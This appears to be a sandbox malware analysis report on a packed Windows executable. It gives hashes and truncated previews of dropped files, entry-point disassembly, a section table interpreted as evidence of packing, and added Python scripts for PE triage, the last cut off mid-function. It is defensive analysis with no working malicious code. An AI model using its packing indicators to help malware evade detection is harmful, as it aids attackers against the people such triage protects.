SSDEEP: 192:yqug5KY33fM0Ks1SnqBju3RzuiFCZ24IO8Ur3:Pug5KYnvKs1SnqBjgzuiFCY4IO8Ur3
MD5: 900814DC1528767E2CB92B572EA04AE7
SHA1: 87D268CBF5DFE4F651A3DC9987563231C3FA68E5
SHA-256: 8505C78EBA357D97CACBD2950B2DAF63CF8022F34F68519970808B5616429B5A
SHA-512: C459D1C61602CA80CE80FE1BED5E475021CCC493E4671F4AE07816ED7C49713429DB51EC733B02FFF4816E700705BAF637EDBD05B40AD360E2D7A8F23345A68C
Malicious: true
Reputation: low
Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.8.6.5.5.3.1.9.7.1.5.5.1.3.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.8.6.5.5.3.2.0.1.5.3.0.1.7.8.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.c.b.5.6.b.6.e.-.5.1.a.8.-.4.3.c.d.-.a.2.7.0.-.8.b.5.d.2.c.8.2.5.f.5.7.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.2.1.2.6.0.9.1.-.c.0.2.a.-.4.7.9.f.-.8.7.c.0.-.7.4.d.c.5.b.7.f.8.e.0.d.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.3.2.4.7...t.m.p...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.f.2.8.-.0.0.0.1.-.0.0.1.3.-.5.f.f.6.-.d.2.4.0.2.9.4.e.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.a.8.5.0.6.8.2.2.b.d.7.4.a.d.7.d.0.7.c.6.a.d.f.9.6.7.a.5.7.3.6.8.0.0.0.0.f.f.f.f.!.0.0.0.0.4.a.2.0.9.5.6.9.0.b.a.8.f.1.3.2.5.d.d.1.0.1.6.7.3.1.8.7.2.8.4.4.7.d.1.2.0.5.8.a.!.3.2.4.7...t.m.p...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.

Process: C:\Windows\SysWOW64\WerFault.exe
File Type: Mini DuMP crash report, 15 streams, Sat Dec 14 13:08:39 2024, 0x1205a4 type
Category: dropped
Size (bytes): 46074
Entropy (8bit): 2.552985577239147
Encrypted: false
SSDEEP: 192:JufrXarHAcjJAarOx1BeqX/NTX0TO/sxxySOV7TcrYhmUELC9qb:nrHAcjDyTBdPlKBkvlFElb
MD5: 4232E7AB0BAA416BBF0D9E5D5AE0B6A7
SHA1: 014DE9462DC3A6F911CC549C3E3F06247702689E
SHA-256: 4389414BB7DE8545017D62F6E6B214CAA6DA2F7854236ADB803BB297D92C414A
SHA-512: 8D7EE36602E915E6D53563C94D405F4C23F4E2397D14421C6012D33AFD3FDB3DDEB1744D2D2002D27443BFECD4D08B473B4D00AAE9447B0BB237646BBFA4642C
Malicious: false
Reputation: low
                                                                                                                                                                                                                                                                        Preview:MDMP..a..... .......W.]g............4...............H...........<.......t...(-..........`.......8...........T............A...r......................................................................................................eJ......\ ......GenuineIntel............T.......(...F.]g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

Process:C:\Windows\SysWOW64\WerFault.exe
File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:dropped
Size (bytes):8288
Entropy (8bit):3.696441365578222
Encrypted:false
SSDEEP:192:R6l7wVeJO0y6nq6YuK66gmfSZVdsX0pDO89b4Ysf2Im:R6lXJOp6q6Yb66gmfSbKX+4LfQ
MD5:7934FD12A42CE2398D17B6EEF6EDEBD0
SHA1:8DDC6BD3CFCA192A5F29B783A78D2101B3DC420B
SHA-256:4B35CA25854E269A40941747C7735CDC1DA16CF876EAD464B3E31665E209FFCD
SHA-512:93DB7480BE57F4C574011929EB727BAE848EC40766CE2D79AE5791BB21B9FBFA83CCEAAC71DFFE014092A5F97F2E81A9804506E770AF2FE3679874D7A1EA7844
Malicious:false
Reputation:low
Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.9.7.6.<./.P.i.

Process:C:\Windows\SysWOW64\WerFault.exe
File Type:XML 1.0 document, ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):4565
Entropy (8bit):4.442135649513889
Encrypted:false
SSDEEP:48:cvIwWl8zsyJg77aI9Ap0qWpW8VYPYm8M4JP9reFN6+q8LxCFLwzwfd:uIjfAI7ap0L7VrJ06PLwzwfd
MD5:3E4DB4C1958EB19B3AD4B7E0D4A3125E
SHA1:E4B2B22305FE9C7FB514554B1D8B10BBFD65568E
SHA-256:D63758E4AD3F88FBBAE5A82EE908259C501E169D2E535EA64934F9BF8A4D8407
SHA-512:37B8AD32139FAA97A48676EC3246CFFD08A98216A11287563B5D55C37FED776AA96E7D2B8B0BFAD1795762B38AE1E17B924E99DF9869C4509A43628252458ADA
Malicious:false
Reputation:low
Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="630971" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

Process:C:\Users\user\Desktop\XIaCqh1vRm.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):361984
Entropy (8bit):6.633746849794654
Encrypted:false
SSDEEP:6144:alAD8SHVttaSqqwtsdu2S6Vfit5Ak+zDwHEjYWZuNCUS:alAZfqqwtuu2nivABAkMWm6
MD5:D88E2431ABAC06BDF0CD03C034B3E5E3
SHA1:4A2095690BA8F1325DD10167318728447D12058A
SHA-256:4D37939B6C9B1E9DEB33FE59B95EFAC6D3B454ADF56E9EE88136A543692EA928
SHA-512:7AA5317DCDF4343F1789E462F4B5D3D23F58E28B97C8C55FC4B3295BF0C26CFB5349B0A3543B05D6AF8FA2BC77F488A5ECE5EAACEAF5211FA98230EA9B7F49A7
Malicious:true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: ReversingLabs, Detection: 42%
Joe Sandbox View:
• Filename: QQx0tdFC0b.exe, Detection: malicious
Reputation:low
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........S...S...S.....f.R...M.t.M...M.e.G...M.s.=...tj..Z...S... ...M.z.R...M.d.R...M.a.R...RichS...........PE..L.....2e......................?.....\.............@...........................C.............................................l)..P.....B.0............................................................................................................text...l........................... ..`.rdata..L".......$..................@..@.data.....=..@...p... ..............@....rsrc...0.....B.....................@..@........................................................................................................................................................................................................................................................................................................................................................................

Process:C:\Users\user\Desktop\XIaCqh1vRm.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):361984
Entropy (8bit):6.633746849794654
Encrypted:false
SSDEEP:6144:alAD8SHVttaSqqwtsdu2S6Vfit5Ak+zDwHEjYWZuNCUS:alAZfqqwtuu2nivABAkMWm6
MD5:D88E2431ABAC06BDF0CD03C034B3E5E3
SHA1:4A2095690BA8F1325DD10167318728447D12058A
SHA-256:4D37939B6C9B1E9DEB33FE59B95EFAC6D3B454ADF56E9EE88136A543692EA928
SHA-512:7AA5317DCDF4343F1789E462F4B5D3D23F58E28B97C8C55FC4B3295BF0C26CFB5349B0A3543B05D6AF8FA2BC77F488A5ECE5EAACEAF5211FA98230EA9B7F49A7
Malicious:true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: ReversingLabs, Detection: 42%
Joe Sandbox View:
• Filename: QQx0tdFC0b.exe, Detection: malicious
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........S...S...S.....f.R...M.t.M...M.e.G...M.s.=...tj..Z...S... ...M.z.R...M.d.R...M.a.R...RichS...........PE..L.....2e......................?.....\.............@...........................C.............................................l)..P.....B.0............................................................................................................text...l........................... ..`.rdata..L".......$..................@..@.data.....=..@...p... ..............@....rsrc...0.....B.....................@..@........................................................................................................................................................................................................................................................................................................................................................................

Process:C:\Windows\SysWOW64\WerFault.exe
File Type:MS Windows registry file, NT/2000 or above
Category:dropped
Size (bytes):1835008
Entropy (8bit):4.2987695735238685
Encrypted:false
SSDEEP:6144:mECqOEmWfd+WQFHy/9026ZTyaRsCDusBqD5dooi8lKSD6VJSRyh:bCsL6seqD5S3SWVARU
MD5:A37069692E6830B6C4B6FD61BC0FB0FF
SHA1:C89FBC1DE515A3FB257FBD6E5F04598362ED3C5D
SHA-256:2B3F9E75E70B7D3E8FE568977D9DADBB4C10E5445F31ABDE9F35A7FB1DA2E017
SHA-512:1A3BA5429ACCAC43272283CCE45049BAA66C8CC34F28C0A185D5332D6895E03EC2AC8B5E504ABDC7E5ED460C077DD31C17DC05F303F88C2E3169952DCECE7DDC
Malicious:false
Preview:regfD...D....\.Z.................... ....`......\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtmf..J)N.................................................................................................................................................................................................................................................................................................................................................~........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
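
Every dropped-file record above carries the same triage fields: a file type taken from the leading bytes, the size, the 8-bit entropy, and MD5/SHA-1/SHA-256/SHA-512 digests; for the PE32 drops the type string is derived from the COFF machine field and the optional header's subsystem, and the static file information for the main sample additionally reports the entry point and the section it falls in. The script below is an added example written for this page, not Joe Sandbox code: it recomputes those fields on a PE32 image that is built in-line as constructed input (no bytes from any file in this report are embedded), resolves the entry point to its section, and compares two records for byte-identical content, which is how the two PE32 dropped entries above, with equal sizes and digests, can be recognised as describing the same bytes. The magic-byte labels, the `Triage` record and the helper names are this example's own choices.

```python
"""Recompute the per-file triage fields a sandbox report lists for each dropped
file (type from the magic bytes, size, 8-bit entropy, MD5/SHA-1/SHA-256/SHA-512)
and, for PE32 images, the entry point and the section holding it.  Added example,
not Joe Sandbox code; the PE32 image built below is constructed sample input."""
import hashlib
import math
import struct
from dataclasses import dataclass
from typing import Dict, Optional, Tuple

IMAGE_FILE_MACHINE_I386 = 0x14C
PE32_MAGIC = 0x10B                                   # PE32+ (0x20B) is out of scope here
SUBSYSTEMS = {2: "GUI", 3: "console"}
MAGICS = [(b"MDMP", "Mini DuMP crash report"),
          (b"regf", "MS Windows registry file, NT/2000 or above"),
          (b"\xff\xfe", "Unicode text, UTF-16, little-endian text"),
          (b"<?xml", "XML 1.0 document, ASCII text"),
          (b"MZ", "MS-DOS executable")]              # refined to PE32 by parse_pe32


@dataclass
class Triage:
    file_type: str
    size: int
    entropy: float
    digests: Dict[str, str]                          # md5/sha1/sha256/sha512, upper-case hex
    entrypoint: Optional[int] = None                 # virtual address: ImageBase + RVA
    entrypoint_section: Optional[str] = None


def shannon_entropy(data: bytes) -> float:
    """Bits per byte, 0.0 .. 8.0: the report's 'Entropy (8bit)' field."""
    if not data:
        return 0.0
    n, counts = len(data), [0] * 256
    for b in data:
        counts[b] += 1
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def parse_pe32(data: bytes) -> Optional[Tuple[str, int, Optional[str]]]:
    """(file type, entry point VA, section containing it) for a PE32 image, else None."""
    if data[:2] != b"MZ" or len(data) < 0x40:
        return None
    pe = struct.unpack_from("<I", data, 0x3C)[0]                     # e_lfanew
    if data[pe:pe + 4] != b"PE\0\0":
        return None
    machine, nsec, _, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", data, pe + 4)
    opt = pe + 24                                                    # after the 20-byte COFF header
    if struct.unpack_from("<H", data, opt)[0] != PE32_MAGIC:
        return None
    entry_rva = struct.unpack_from("<I", data, opt + 16)[0]
    image_base = struct.unpack_from("<I", data, opt + 28)[0]
    subsystem = struct.unpack_from("<H", data, opt + 68)[0]
    arch = "Intel 80386" if machine == IMAGE_FILE_MACHINE_I386 else f"machine 0x{machine:x}"
    file_type = f"PE32 executable ({SUBSYSTEMS.get(subsystem, subsystem)}) {arch}, for MS Windows"
    section = None
    for i in range(nsec):                                            # 40-byte section headers
        name, vsize, rva, raw = struct.unpack_from("<8sIII", data, opt + opt_size + 40 * i)
        if rva <= entry_rva < rva + (vsize or raw):
            section = name.rstrip(b"\0").decode("ascii", "replace")
            break
    return file_type, image_base + entry_rva, section


def triage(data: bytes) -> Triage:
    digests = {h: getattr(hashlib, h)(data).hexdigest().upper() for h in ("md5", "sha1", "sha256", "sha512")}
    file_type = next((label for magic, label in MAGICS if data.startswith(magic)), "data")
    t = Triage(file_type, len(data), shannon_entropy(data), digests)
    pe = parse_pe32(data)
    if pe:
        t.file_type, t.entrypoint, t.entrypoint_section = pe
    return t


def same_content(a: Triage, b: Triage) -> bool:
    """Two records describe byte-identical files when size and every digest agree."""
    return a.size == b.size and a.digests == b.digests


def build_sample_pe32(entry_rva: int = 0x185C, image_base: int = 0x400000) -> bytes:
    """Constructed PE32 (i386, GUI) with .text/.rdata/.data headers; parseable, not runnable."""
    secs = [(b".text", 0x1000, 0x2000, 0x60000020), (b".rdata", 0x3000, 0x1000, 0x40000040),
            (b".data", 0x4000, 0x1000, 0xC0000040)]                  # name, RVA, size, characteristics
    img = bytearray(0x40)
    img[:2] = b"MZ"
    struct.pack_into("<I", img, 0x3C, 0x40)                          # e_lfanew: PE signature at 0x40
    img += b"PE\0\0" + struct.pack("<HHIIIHH", IMAGE_FILE_MACHINE_I386, len(secs), 0, 0, 0, 0xE0, 0x0102)
    opt = bytearray(0xE0)
    struct.pack_into("<H", opt, 0, PE32_MAGIC)
    struct.pack_into("<I", opt, 16, entry_rva)
    struct.pack_into("<I", opt, 28, image_base)
    struct.pack_into("<II", opt, 32, 0x1000, 0x200)                 # section / file alignment
    struct.pack_into("<H", opt, 68, 2)                               # IMAGE_SUBSYSTEM_WINDOWS_GUI
    struct.pack_into("<I", opt, 92, 16)                              # NumberOfRvaAndSizes
    img += opt
    raw_ptr = 0x400
    for name, rva, size, chars in secs:
        img += struct.pack("<8sIIIIIIHHI", name, size, rva, size, raw_ptr, 0, 0, 0, 0, chars)
        raw_ptr += size
    img += b"\0" * (0x400 - len(img)) + bytes(range(256)) * 64        # padded headers, then section data
    return bytes(img)
```

`triage(build_sample_pe32())` returns the report-style type string `PE32 executable (GUI) Intel 80386, for MS Windows` with the entry point resolved to `.text`; `triage(open(path, "rb").read())` does the same for a real sample. As a triage rule of thumb, an entry point that resolves to no section or to a non-code section, or a whole-file entropy approaching 8.0, is a quick indicator that the image is packed and that the on-disk sections will not match what runs.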

File type:PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):6.9638026024068775
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:XIaCqh1vRm.exe
File size:429'568 bytes
MD5:e94835b4d3d35d99400dfd68fe580197
SHA1:fd0b6060e72be90a15c8681a01cccdf7d90df179
SHA256:1141d5ceaf0e3cddc1e1980fb60dc53e94374c6c5e43185297a7a87feb42e9b3
SHA512:ae0a8b14aa220b793d5cb0a7102d95c8995456a71eb0f7674467f2277eca378233d93fa5465bb0357bb07b001e2269270c7d71f0a7bfc998e164228dcb838379
SSDEEP:6144:NbBD4jta2GFeW0QYdWT9xPzfjU8HfTQBbAzegv+i:Nbe5aB0fYxTFOAvJ
TLSH:8994D003A2F0AD21F6B68B329D3AF3D82B3FF5615E34676E22545A5F09701E2C572712
File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........S...S...S.....f.R...M.t.M...M.e.G...M.s.=...tj..Z...S... ...M.z.R...M.d.R...M.a.R...RichS...........PE..L.....of...........
Icon Hash:46c7c30b0f4e0d19
Entrypoint:0x40185c
Entrypoint Section:.text
Digitally signed:false
Imagebase:0x400000
Subsystem:windows gui
                                                                                                                                                                                                                                                                        Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                                                                        DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                                                        Time Stamp:0x666FB898 [Mon Jun 17 04:16:24 2024 UTC]
                                                                                                                                                                                                                                                                        TLS Callbacks:
                                                                                                                                                                                                                                                                        CLR (.Net) Version:
                                                                                                                                                                                                                                                                        OS Version Major:5
                                                                                                                                                                                                                                                                        OS Version Minor:0
                                                                                                                                                                                                                                                                        File Version Major:5
                                                                                                                                                                                                                                                                        File Version Minor:0
                                                                                                                                                                                                                                                                        Subsystem Version Major:5
                                                                                                                                                                                                                                                                        Subsystem Version Minor:0
                                                                                                                                                                                                                                                                        Import Hash:28289f2f7e0a533d999708a3ae088e0b
Instructions at the entry point (0x40185c):
call 00007FB724D19896h
jmp 00007FB724D15F1Dh
mov edi, edi
push ebp
mov ebp, esp
sub esp, 00000328h
mov dword ptr [00456C18h], eax
mov dword ptr [00456C14h], ecx
mov dword ptr [00456C10h], edx
mov dword ptr [00456C0Ch], ebx
mov dword ptr [00456C08h], esi
mov dword ptr [00456C04h], edi
mov word ptr [00456C30h], ss
mov word ptr [00456C24h], cs
mov word ptr [00456C00h], ds
mov word ptr [00456BFCh], es
mov word ptr [00456BF8h], fs
mov word ptr [00456BF4h], gs
pushfd
pop dword ptr [00456C28h]
mov eax, dword ptr [ebp+00h]
mov dword ptr [00456C1Ch], eax
mov eax, dword ptr [ebp+04h]
mov dword ptr [00456C20h], eax
lea eax, dword ptr [ebp+08h]
mov dword ptr [00456C2Ch], eax
mov eax, dword ptr [ebp-00000320h]
mov dword ptr [00456B68h], 00010001h
mov eax, dword ptr [00456C20h]
mov dword ptr [00456B1Ch], eax
mov dword ptr [00456B10h], C0000409h
mov dword ptr [00456B14h], 00000001h
mov eax, dword ptr [00454004h]
mov dword ptr [ebp-00000328h], eax
mov eax, dword ptr [00454008h]
mov dword ptr [ebp-00000324h], eax
call dword ptr [000000C0h]

Note on the listing: the first two instructions (a call followed by an unconditional jmp) are the standard MSVC CRT entry stub (security-cookie initialisation, then a jump to the CRT startup routine), consistent with the VS2008 toolchain identified below. Everything after the jmp is not part of the entry function: the disassembler continued linearly into the next routine, whose shape (saving all general and segment registers plus EFLAGS to global storage, then writing the exception code C0000409h, STATUS_STACK_BUFFER_OVERRUN, with flags 00000001h before calling through the import table) matches the CRT's buffer-overrun reporting routine rather than sample-specific code. The call/jmp targets shown fall far outside the image's address range (base 0x400000, about 0x441000 bytes mapped), so resolve them from the file bytes rather than from this listing.
Programming Language (toolchain identified from the Rich header):
• [C++] VS2008 build 21022
• [ASM] VS2008 build 21022
• [ C ] VS2008 build 21022
• [IMP] VS2005 build 50727
• [RES] VS2008 build 21022
• [LNK] VS2008 build 21022
Data directories:
Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0x5296c          0x50          .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE        0x431000         0xf430        .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0x0              0x0
IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x524d0          0x40          .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x51000          0x188         .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0

The empty SECURITY and BASERELOC entries match "Digitally signed: false" and RELOCS_STRIPPED above; the empty TLS and COM_DESCRIPTOR entries confirm there are no TLS callbacks and no .NET metadata. Only the import table (0x50 bytes, a single descriptor's worth plus terminator) and a 0x188-byte IAT are present, so most API resolution must happen at run time, which agrees with the "dynamically determine API calls" signature in the overview.
Sections:
Name    Virtual Address  Virtual Size  Raw Size  MD5                               Xored PE  ZLIB Complexity     File Type  Entropy            Characteristics
.text   0x1000           0x4fe4c       0x50000   6fa4e302ee04298d9ef2d3f153c40e85  False     0.84364013671875    data       7.542990652047153  IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata  0x51000          0x224c        0x2400    6e858d54905a9a5f8a9ead82a28e3b16  False     0.3491753472222222  data       5.344533170604138  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data   0x54000          0x3dc49c      0x7000    28a57dd7288e2b8b2562b2ba5629c13a  unknown   unknown             unknown    unknown            IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc   0x431000         0xf430        0xf600    97c576aca8eda0ec829e9e2a78595657  False     0.4743870680894309  data       5.067941475082293  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Reading the table: .text is executable and not writable, yet its entropy of 7.54 bits/byte and ZLIB complexity of 0.84 are what compressed or encrypted data look like, not compiler output. .data declares a VirtualSize of 0x3dc49c (about 3.9 MB) against only 0x7000 bytes on disk, leaving a large zero-initialised, writable region in memory. Together with the "Detected unpacking (changes PE section rights)" and "(overwrites its own PE header)" signatures in the overview, this is consistent with a packed stub that decrypts its payload into that region at run time; the "unknown" cells mean those metrics were not computed for .data.
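The header fields (timestamp, file characteristics, entry point section) and the section table above are what a reviewer reproduces first when a sandbox flags unpacking. The following Python is an added example, not Joe Sandbox code and not code from the sample: it parses a PE32 header and section table, decodes the timestamp and characteristics, computes per-section Shannon entropy and the virtual/raw size ratio, and applies the triage heuristics a reviewer applies to a table like the one above (the thresholds 7.0 bits and a 4x size ratio are assumed working values, not values from the report). The PE it parses is constructed in memory by build_sample_pe(); only the timestamp value 0x666FB898 is reused from this report so the decoding can be compared with the "Time Stamp" line. Joe Sandbox's "ZLIB Complexity" is a separate compressibility measure and is not reproduced here.

```python
"""Static PE triage in the spirit of a sandbox report's static view: decode the file
header (timestamp, characteristics), walk the section table, compute per-section
Shannon entropy and the virtual/raw size ratio, and locate the entry point's section.
Added example; build_sample_pe() constructs a test PE in memory (not the analysed file)."""
import math
import struct
from collections import Counter
from datetime import datetime, timezone

FILE_CHARACTERISTICS = [(0x0001, "RELOCS_STRIPPED"), (0x0002, "EXECUTABLE_IMAGE"),
                        (0x0020, "LARGE_ADDRESS_AWARE"), (0x0100, "32BIT_MACHINE"), (0x2000, "DLL")]
IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA = 0x20, 0x40
IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE = 0x20000000, 0x40000000, 0x80000000


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for constant data, 8.0 for a uniform byte histogram."""
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values()) if n else 0.0


def parse_pe(pe: bytes) -> dict:
    """DOS header -> PE signature -> IMAGE_FILE_HEADER -> PE32 optional header -> sections."""
    if pe[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew, = struct.unpack_from("<I", pe, 0x3C)
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    fh = e_lfanew + 4                                   # IMAGE_FILE_HEADER (20 bytes)
    _machine, nsec, ts, _, _, opt_size, chars = struct.unpack_from("<HHIIIHH", pe, fh)
    opt = fh + 20                                       # IMAGE_OPTIONAL_HEADER32
    if struct.unpack_from("<H", pe, opt)[0] != 0x10B:   # PE32 only; PE32+ puts ImageBase at +24
        raise ValueError("not a PE32 image")
    entry, = struct.unpack_from("<I", pe, opt + 16)     # AddressOfEntryPoint (RVA)
    image_base, = struct.unpack_from("<I", pe, opt + 28)
    sections = []
    for i in range(nsec):                               # 40-byte IMAGE_SECTION_HEADER entries
        name, vsize, va, rawsize, rawptr, _, _, _, _, flags = struct.unpack_from(
            "<8sIIIIIIHHI", pe, opt + opt_size + i * 40)
        sections.append({
            "name": name.rstrip(b"\0").decode("ascii", "replace"),
            "virtual_address": va, "virtual_size": vsize, "raw_size": rawsize,
            "entropy": shannon_entropy(pe[rawptr:rawptr + rawsize]),
            "executable": bool(flags & IMAGE_SCN_MEM_EXECUTE),
            "writable": bool(flags & IMAGE_SCN_MEM_WRITE),
        })
    return {"timestamp": ts,
            "timestamp_utc": datetime.fromtimestamp(ts, tz=timezone.utc).strftime("%Y-%m-%d %H:%M:%S"),
            "file_characteristics": [n for bit, n in FILE_CHARACTERISTICS if chars & bit],
            "entry_point": entry, "image_base": image_base, "sections": sections}


def section_for_rva(sections, rva):
    """Name of the section whose virtual range covers rva (e.g. the entry point)."""
    for s in sections:
        if s["virtual_address"] <= rva < s["virtual_address"] + max(s["virtual_size"], s["raw_size"]):
            return s["name"]
    return None


def triage(sections, entropy_threshold=7.0, bloat_ratio=4.0):
    """Reviewer heuristics over the section table; thresholds are assumed working values."""
    findings = []
    for s in sections:
        if s["executable"] and s["entropy"] >= entropy_threshold:
            findings.append((s["name"], "high_entropy_code"))        # packed or encrypted code
        if s["executable"] and s["writable"]:
            findings.append((s["name"], "writable_executable"))      # code that rewrites itself
        if s["raw_size"] and s["virtual_size"] / s["raw_size"] >= bloat_ratio:
            findings.append((s["name"], "virtual_bloat"))            # room for an unpacked payload
    return findings


def build_sample_pe() -> bytes:
    """Constructed two-section PE32 (not the analysed file): .text has a uniform byte
    histogram (entropy 8.0); .data is zero-filled with VirtualSize 0x10000 vs 0x200 raw.
    Only the timestamp value is taken from the report, to show the decoding."""
    text, data, file_align = bytes(range(256)) * 2, b"\0" * 0x200, 0x200
    dos = bytearray(b"MZ".ljust(0x40, b"\0"))
    struct.pack_into("<I", dos, 0x3C, 0x40)                        # e_lfanew
    file_hdr = struct.pack("<HHIIIHH", 0x14C, 2, 0x666FB898, 0, 0, 0xE0, 0x0103)
    opt = bytearray(0xE0)
    struct.pack_into("<H", opt, 0, 0x10B)                          # PE32 magic
    struct.pack_into("<I", opt, 16, 0x1000)                        # AddressOfEntryPoint
    struct.pack_into("<I", opt, 28, 0x400000)                      # ImageBase
    struct.pack_into("<II", opt, 32, 0x1000, file_align)           # Section/File alignment
    struct.pack_into("<H", opt, 68, 2)                             # Subsystem: Windows GUI
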